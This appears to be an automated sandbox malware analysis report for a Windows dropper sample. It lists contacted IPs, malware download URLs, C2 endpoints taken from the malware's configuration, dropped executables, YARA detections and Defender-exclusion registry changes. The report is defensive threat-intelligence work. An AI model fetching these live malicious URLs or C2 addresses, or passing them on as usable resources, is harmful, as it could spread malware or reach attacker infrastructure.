95.142.206.3	unknown	Russian Federation	47541	VKONTAKTE-SPB-AShttpvkcomRU	false
95.142.206.0	unknown	Russian Federation	47541	VKONTAKTE-SPB-AShttpvkcomRU	false
95.142.206.2	unknown	Russian Federation	47541	VKONTAKTE-SPB-AShttpvkcomRU	false
95.142.206.1	unknown	Russian Federation	47541	VKONTAKTE-SPB-AShttpvkcomRU	false
40.126.31.69	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
5.42.66.47	unknown	Russian Federation	39493	RU-KSTVKolomnaGroupofcompaniesGuarantee-tvRU	false
207.180.242.32	unknown	Germany	51167	CONTABODE	false
185.172.128.82	unknown	Russian Federation	50916	NADYMSS-ASRU	false
104.192.108.20	unknown	United States	55992	QIHOOBeijingQihuTechnologyCompanyLimitedCN	false
40.119.148.38	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
5.42.66.10	unknown	Russian Federation	39493	RU-KSTVKolomnaGroupofcompaniesGuarantee-tvRU	false
93.184.221.240	unknown	European Union	15133	EDGECASTUS	false
20.190.159.4	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
13.227.219.55	unknown	United States	16509	AMAZON-02US	false
188.114.96.3	unknown	European Union	13335	CLOUDFLARENETUS	false
13.227.219.51	unknown	United States	16509	AMAZON-02US	false
13.227.219.18	unknown	United States	16509	AMAZON-02US	false
190.224.203.37	unknown	Argentina	7303	TelecomArgentinaSAAR	true
103.146.158.221	unknown	unknown	135763	GAYATRI-ASGAYATRICOMMUNICATIONSIN	false
104.21.4.208	unknown	United States	13335	CLOUDFLARENETUS	false
45.130.41.108	unknown	Russian Federation	198610	BEGET-ASRU	false
108.156.60.9	unknown	United States	16509	AMAZON-02US	false

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://guteyr.cc/tmp/index.php	true	3%, Virustotal, Browse Avira URL Cloud: safe	unknown

AV Detection

Antivirus detection for URL or domain

Source: http://45.129.96.86:80/file/update.exe	Avira URL Cloud: Label: malware
Source: https://f.123654987.xyz/525403/setup.exe_	Avira URL Cloud: Label: malware
Source: https://f.123654987.xyz/525403/setup.exev	Avira URL Cloud: Label: malware
Source: http://66.85.156.89/nafdhkdf.exe	Avira URL Cloud: Label: malware
Source: https://monoblocked.com/525403/setup.exe	Avira URL Cloud: Label: malware
Source: https://lop.foxesjoy.com:80/ssl/crt.exeBt	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\8RYSoZQFK6V9LYpTMM1le7yQ.exe	Avira: detection malicious, Label: HEUR/AGEN.1311176
Source: C:\Users\user\AppData\Local\4lBshxehGejQoegWUuOtgGGK.exe	Avira: detection malicious, Label: HEUR/AGEN.1311176
Source: C:\Users\user\AppData\Local\DYOHZPW0D22LInRRNxYgymyV.exe	Avira: detection malicious, Label: HEUR/AGEN.1314708
Source: C:\Users\user\AppData\Local\2nhKzHIgDWCzStH9EAQv4dqj.exe	Avira: detection malicious, Label: HEUR/AGEN.1314708
Source: C:\Users\user\AppData\Local\CwXesQHbkmvSYkF54FDCGs0u.exe	Avira: detection malicious, Label: HEUR/AGEN.1314708
Source: C:\Users\user\AppData\Local\JRER40VeoC2Q4ducOjAkB8be.exe	Avira: detection malicious, Label: HEUR/AGEN.1314708

Found malware configuration

Source: 00000008.00000002.1710200327.0000000002E20000.00000004.00001000.00020000.00000000.sdmp

Multi AV Scanner detection for domain / URL

Source: https://yip.su/redirect-	Virustotal: Detection: 7%	Perma Link
Source: http://5.42.66.10/download/th/retail.phphp	Virustotal: Detection: 6%	Perma Link
Source: http://45.129.96.86:80/file/update.exe	Virustotal: Detection: 20%	Perma Link

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\2nhKzHIgDWCzStH9EAQv4dqj.exe	ReversingLabs: Detection: 18%
Source: C:\Users\user\AppData\Local\CwXesQHbkmvSYkF54FDCGs0u.exe	ReversingLabs: Detection: 18%
Source: C:\Users\user\AppData\Local\DYOHZPW0D22LInRRNxYgymyV.exe	ReversingLabs: Detection: 18%
Source: C:\Users\user\AppData\Local\JRER40VeoC2Q4ducOjAkB8be.exe	ReversingLabs: Detection: 18%
Source: C:\Users\user\AppData\Local\KFwijURKZUrjToqwGsuVqcsD.exe	ReversingLabs: Detection: 52%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\Default15_s[1].exe	ReversingLabs: Detection: 31%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\Retailer_prog[1].exe	ReversingLabs: Detection: 34%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\oiii[1].exe	ReversingLabs: Detection: 45%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\123p[1].exe	ReversingLabs: Detection: 91%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\default_s[1].exe	ReversingLabs: Detection: 31%
Source: C:\Users\user\AppData\Local\SMjkjKVfovgJQv0DVgLWunVz.exe	ReversingLabs: Detection: 52%
Source: C:\Users\user\AppData\Local\TZazqzIjmIm4XQvcJYbdkOMa.exe	ReversingLabs: Detection: 52%
Source: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exe	ReversingLabs: Detection: 75%
Source: C:\Users\user\AppData\Local\Temp\ED0F.exe	ReversingLabs: Detection: 95%
Source: C:\Users\user\AppData\Local\VEH3hOo7SH8Curivn14XA2XL.exe	ReversingLabs: Detection: 18%
Source: C:\Users\user\AppData\Local\aqGWEPmkK0B9sJyfEBtpOpuJ.exe	ReversingLabs: Detection: 18%
Source: C:\Users\user\AppData\Local\eVDrCR1hP70QTfLbRAKhpUOl.exe	ReversingLabs: Detection: 52%
Source: C:\Users\user\AppData\Local\gsV4lhPLd9AgpTxUWWWokC1J.exe	ReversingLabs: Detection: 52%
Source: C:\Users\user\AppData\Local\iMXraNxDRLg4aVOpMn3cNrIf.exe	ReversingLabs: Detection: 52%
Source: C:\Users\user\AppData\Local\j19ppip6hQlQefTQJUWb1E5Y.exe	ReversingLabs: Detection: 18%
Source: C:\Users\user\AppData\Local\jRw9sx4Ek0t13Tr93vMM8tJ1.exe	ReversingLabs: Detection: 52%
Source: C:\Users\user\AppData\Local\o3bvuCFHWJf8oEmP3T0jhkMM.exe	ReversingLabs: Detection: 52%

Multi AV Scanner detection for submitted file

Source: lgX7lgUL1w.exe

Virustotal: Detection: 20%

Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 83.7% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\8RYSoZQFK6V9LYpTMM1le7yQ.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\4lBshxehGejQoegWUuOtgGGK.exe	Joe Sandbox ML: detected

Exploits

Yara detected UAC Bypass using CMSTP

Source: Yara match	File source: lgX7lgUL1w.exe, type: SAMPLE
Source: Yara match	File source: 0.2.lgX7lgUL1w.exe.233c5000058.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.lgX7lgUL1w.exe.7ff7e3570000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.lgX7lgUL1w.exe.7ff7e3570000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.lgX7lgUL1w.exe.233c5000058.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.lgX7lgUL1w.exe.233c4d28818.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.1201842177.00007FF7E36ED000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1217812162.00007FF7E36ED000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1217762713.00007FF7E369D000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1213051292.00000233C4D27000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: lgX7lgUL1w.exe PID: 968, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\lgX7lgUL1w.exe, type: DROPPED

Source: C:\Users\user\Pictures\PZ3hKWPffUrXuh6Gjn77Ivv1.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Source: lgX7lgUL1w.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:	Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1460357142.0000000004EE0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1457134681.0000000004DC2000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1458012640.0000000004D51000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1462785010.000000000515A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: Z:\Development\SecureEngine\src\plugins_manager\internal_plugins\embedded dlls\TlsHelperXBundler\x64\Release\XBundlerTlsHelper.pdb source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000000.1290598899.00000001409DF000.00000080.00000001.01000000.0000000E.sdmp
Source:	Binary string: C:\vmagent_new\bin\joblist\806392\out\Release\Installer.pdb source: xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1334164364.0000000004E44000.00000004.00000020.00020000.00000000.sdmp, xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1335128422.0000000004F05000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: bash.pdbGCTL source: iYU7jmLL0jPLxgjctxjq1ReZ.exe, 00000012.00000003.1298739977.00000000020A0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: bash.pdb source: iYU7jmLL0jPLxgjctxjq1ReZ.exe, 00000012.00000003.1298739977.00000000020A0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: notepad.pdbGCTL source: iYU7jmLL0jPLxgjctxjq1ReZ.exe, 00000012.00000003.1298739977.00000000020A0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: notepad.pdb source: iYU7jmLL0jPLxgjctxjq1ReZ.exe, 00000012.00000003.1298739977.00000000020A0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\miniprojects\x86il\il86\x64\release\IL86.pdb! source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000000.1290598899.0000000140BB1000.00000080.00000001.01000000.0000000E.sdmp
Source:	Binary string: auditpol.pdbGCTL source: iYU7jmLL0jPLxgjctxjq1ReZ.exe, 00000012.00000003.1298739977.00000000020A0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\constructicon\builds\gfx\three\20.10\drivers\2d\dal\eeu\atieah\build\wNow64a\B_rel\atieah64.pdb source: iYU7jmLL0jPLxgjctxjq1ReZ.exe, 00000012.00000003.1298739977.00000000020A0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\miniprojects\x86il\il86\x64\release\IL86.pdb source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000000.1290598899.0000000140BB1000.00000080.00000001.01000000.0000000E.sdmp
Source:	Binary string: F:\workspace\_work\1\s\artifacts\obj\win-x64.Release\corehost\cli\apphost\Release\apphost.pdbhhh source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1420338649.0000000004EE0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1426212707.0000000004460000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1426427943.0000000004461000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1420528579.0000000004FA0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: F:\workspace\_work\1\s\artifacts\obj\win-x64.Release\corehost\cli\apphost\Release\apphost.pdb source: c12YwoiQ34lE0LgBRkxJOClX.exe, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1420338649.0000000004EE0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1426212707.0000000004460000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1426427943.0000000004461000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1420528579.0000000004FA0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\vmagent_new\bin\joblist\615425\out\Release\360Installer.pdb0pH\| source: xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000000.1257115899.0000000000471000.00000002.00000001.01000000.00000006.sdmp
Source:	Binary string: auditpol.pdb source: iYU7jmLL0jPLxgjctxjq1ReZ.exe, 00000012.00000003.1298739977.00000000020A0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\vmagent_new\bin\joblist\615425\out\Release\360Installer.pdb source: xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000000.1257115899.0000000000471000.00000002.00000001.01000000.00000006.sdmp

Change of critical system settings

Adds extensions / path to Windows Defender exclusion list (Registry)

Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Registry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{4CD858B3-107C-48BB-950A-EADAAF604C18}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions Exclusions_Extensions
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Registry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{4CD858B3-107C-48BB-950A-EADAAF604C18}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions exe

Spreading

Yara detected Neoreklami

Source: Yara match

File source: Process Memory Space: Install.exe PID: 8020, type: MEMORYSTR

Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exe	Code function: 18_2_0040553A FindFirstFileA,		18_2_0040553A
Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exe	Code function: 18_2_004055DE __EH_prolog,FindFirstFileW,AreFileApisANSI,FindFirstFileA,		18_2_004055DE

Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exe	File opened: C:\Users\user~1\
Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exe	File opened: C:\Users\user~1\AppData\Local\Temp\
Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exe	File opened: C:\Users\user~1\AppData\Local\Temp\7zSA05C.tmp\Install.exe
Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exe	File opened: C:\Users\user~1\AppData\Local\Temp\7zSA05C.tmp\
Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exe	File opened: C:\Users\user~1\AppData\Local\
Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exe	File opened: C:\Users\user~1\AppData\

Networking

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 91.202.233.231 80
Source: C:\Windows\explorer.exe	Network Connect: 190.224.203.37 80
Source: C:\Windows\explorer.exe	Network Connect: 45.129.96.86 80
Source: C:\Windows\explorer.exe	Network Connect: 66.85.156.89 80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: http://dbfhns.in/tmp/index.php
Source: Malware configuration extractor	URLs: http://guteyr.cc/tmp/index.php
Source: Malware configuration extractor	URLs: http://greendag.ru/tmp/index.php
Source: Malware configuration extractor	URLs: http://lobulraualov.in.net/tmp/index.php

Creates HTML files with .exe extension (expired dropper behavior)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: WaSFZllUCVoGMQbapl7iiNhG.exe.5.dr
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: kIqVtyaJ3Md4voRq7FbxRbNc.exe.5.dr
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: BuFPDwZaV1iS9PXkCB7kSU2D.exe.5.dr
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: VwW7Zrgqb8W4pCzz9zGBtVYi.exe.5.dr
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: QlycVMt9XxnRzBMLYO9bD2Xg.exe.5.dr
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: fb815uICkCyOkfRy3eesDn62.exe.5.dr
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: F4U52lR6G7O1cHxteAioycWo.exe.5.dr
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: 1QmyjDm1eFH0lgBrYiowPc38.exe.5.dr
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: aQ7CUsrnipUkMOjgF0nKuX1q.exe.5.dr
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: cIoVbmWEriSiViaXsDVPRBww.exe.5.dr
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: w4xiNBVLdPuuQzpgLYTzx18Y.exe.5.dr
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: 2Ik0JEK56ZEfeWSnlWXlxAQH.exe.5.dr
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: SemaoG1Uwehw633tFAn5ubO2.exe.5.dr
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: qDDOYpn1QugD92FNbGgaxms8.exe.5.dr
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: YX45oTvqMEPC5GJFPgqFMHJF.exe.5.dr
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: RzyrdRTROyDyffduQ1CbhttT.exe.5.dr
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: S0yywC6t6qDFXXOiN4mRrQOm.exe.5.dr
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: 8PAbeHuClLlqK8bLhAM9cs8l.exe.5.dr
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: fqTri05otLw3AgCCHnmdVecS.exe.5.dr
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: YV2wsGyAOAc9vN2gHfk2THwt.exe.5.dr
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: Wh0WdTK7FmemcqdqznsDUek0.exe.5.dr
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: OEf7asb27AljF1U8YK72cN6l.exe.5.dr
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: 8x9fHtTH22TaURiMTLqQ6qDQ.exe.5.dr
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: JjDJbN3mgLfy7jfCjajQylmg.exe.5.dr
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: 7XiHagxRttiQJ0jD8B1KcnGB.exe.5.dr
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: BoufAyOi6g3dz7fgFn5cKMkk.exe.5.dr
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: tFMRJ2N4WXQX8R9XoXwDeTd7.exe.5.dr
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: ECaYsN3ZlPVQpORLp9yKqP3b.exe.5.dr
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: GEiB3Ddcoc4kuTiV3LIO2ABQ.exe.5.dr
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: acQeHpiFDRznT8wjZFcvB4qB.exe.5.dr
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: WAQu9tLKGblXXebB2miyLMLA.exe.5.dr
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: ZkgAUWW1XaYJAcqvB0QszT7a.exe.5.dr
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: QdAnaM3mjG9zwvm6YlndB8Yg.exe.5.dr
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: twwmm95SEd1qhyzlGrhpRq1C.exe.5.dr
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: yn8qA7eUPrrxMa2hPKWNWLT4.exe.5.dr
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: TUdvQ3wmTDhA7WvLZJFgTEvp.exe.5.dr
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	File created: e3VBEHEyvWHF7UQhQQ1Xwuc5.exe.19.dr
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	File created: AaWaOfvGFn1i9dXWYSo7dRjD.exe.19.dr
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	File created: 49PhL2u6RJaN6gkfIG6mTjtg.exe.19.dr

Yara detected Generic Downloader

Source: Yara match	File source: 5.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.lgX7lgUL1w.exe.233c776f568.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.lgX7lgUL1w.exe.233c4d28818.0.raw.unpack, type: UNPACKEDPE

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 85.192.56.26 85.192.56.26
Source: Joe Sandbox View	IP Address: 85.192.56.26 85.192.56.26
Source: Joe Sandbox View	IP Address: 87.240.132.78 87.240.132.78
Source: Joe Sandbox View	IP Address: 87.240.132.78 87.240.132.78
Source: Joe Sandbox View	IP Address: 104.192.108.17 104.192.108.17

Source: c12YwoiQ34lE0LgBRkxJOClX.exe	String found in binary or memory: //cdn.syndication.twimg.com https://www.instagram.com https://connect.facebook.net https://telegram.org https://.yandex.ru https://.google-analytics.com https://.youtube.com https://maps.googleapis.com https://translate.googleapis.com https://.google.com h equals www.facebook.com (Facebook)
Source: c12YwoiQ34lE0LgBRkxJOClX.exe	String found in binary or memory: //cdn.syndication.twimg.com https://www.instagram.com https://connect.facebook.net https://telegram.org https://.yandex.ru https://.google-analytics.com https://.youtube.com https://maps.googleapis.com https://translate.googleapis.com https://.google.com h equals www.youtube.com (Youtube)
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1476455435.0000000004460000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Content-Security-Policy: default-src * data: blob: about: vkcalls:;script-src 'self' https://vk.com https://.vk.com https://vk.ru https://.vk.ru https://static.vk.me https://.mail.ru https://r.mradx.net https://s.ytimg.com https://platform.twitter.com https://cdn.syndication.twimg.com https://www.instagram.com https://connect.facebook.net https://telegram.org https://.yandex.ru https://.google-analytics.com https://.youtube.com https://maps.googleapis.com https://translate.googleapis.com https://.google.com https://google.com https://.vkpartner.ru https://.moatads.com https://.adlooxtracking.ru https://.serving-sys.ru https://.weborama-tech.ru https://.gstatic.com https://.google.ru https://securepubads.g.doubleclick.net https://cdn.ampproject.org https://www.googletagmanager.com https://googletagmanager.com https://.vk-cdn.net https://.hit.gemius.pl https://yastatic.net https://analytics.tiktok.com 'unsafe-inline' 'unsafe-eval' blob:;style-src https://vk.com https://*.vk.c equals www.facebook.com (Facebook)
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1476455435.0000000004460000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Content-Security-Policy: default-src * data: blob: about: vkcalls:;script-src 'self' https://vk.com https://.vk.com https://vk.ru https://.vk.ru https://static.vk.me https://.mail.ru https://r.mradx.net https://s.ytimg.com https://platform.twitter.com https://cdn.syndication.twimg.com https://www.instagram.com https://connect.facebook.net https://telegram.org https://.yandex.ru https://.google-analytics.com https://.youtube.com https://maps.googleapis.com https://translate.googleapis.com https://.google.com https://google.com https://.vkpartner.ru https://.moatads.com https://.adlooxtracking.ru https://.serving-sys.ru https://.weborama-tech.ru https://.gstatic.com https://.google.ru https://securepubads.g.doubleclick.net https://cdn.ampproject.org https://www.googletagmanager.com https://googletagmanager.com https://.vk-cdn.net https://.hit.gemius.pl https://yastatic.net https://analytics.tiktok.com 'unsafe-inline' 'unsafe-eval' blob:;style-src https://vk.com https://*.vk.c equals www.twitter.com (Twitter)
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1476455435.0000000004460000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Content-Security-Policy: default-src * data: blob: about: vkcalls:;script-src 'self' https://vk.com https://.vk.com https://vk.ru https://.vk.ru https://static.vk.me https://.mail.ru https://r.mradx.net https://s.ytimg.com https://platform.twitter.com https://cdn.syndication.twimg.com https://www.instagram.com https://connect.facebook.net https://telegram.org https://.yandex.ru https://.google-analytics.com https://.youtube.com https://maps.googleapis.com https://translate.googleapis.com https://.google.com https://google.com https://.vkpartner.ru https://.moatads.com https://.adlooxtracking.ru https://.serving-sys.ru https://.weborama-tech.ru https://.gstatic.com https://.google.ru https://securepubads.g.doubleclick.net https://cdn.ampproject.org https://www.googletagmanager.com https://googletagmanager.com https://.vk-cdn.net https://.hit.gemius.pl https://yastatic.net https://analytics.tiktok.com 'unsafe-inline' 'unsafe-eval' blob:;style-src https://vk.com https://*.vk.c equals www.youtube.com (Youtube)

Source: c12YwoiQ34lE0LgBRkxJOClX.exe, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1409059874.000000000062B000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1457084497.00000000043CA000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1426618374.00000000043C0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1478565059.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1420648647.00000000043C0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1419328721.00000000043C0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1413612501.00000000043C0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1453551457.00000000043C4000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1414376401.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1460930555.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1457040379.00000000043C7000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1421794459.00000000043C0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1479265140.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1417160480.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1414955708.00000000043C9000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1450196885.00000000043C4000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1429282984.00000000043C4000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1414285258.000000000062B000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1452926000.00000000043C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.47.149:54674/vape/niko.exe
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1409059874.000000000062B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.47.149:54674/vape/niko.exe7c
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1420648647.00000000043C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.47.149:54674/vape/niko.exe8
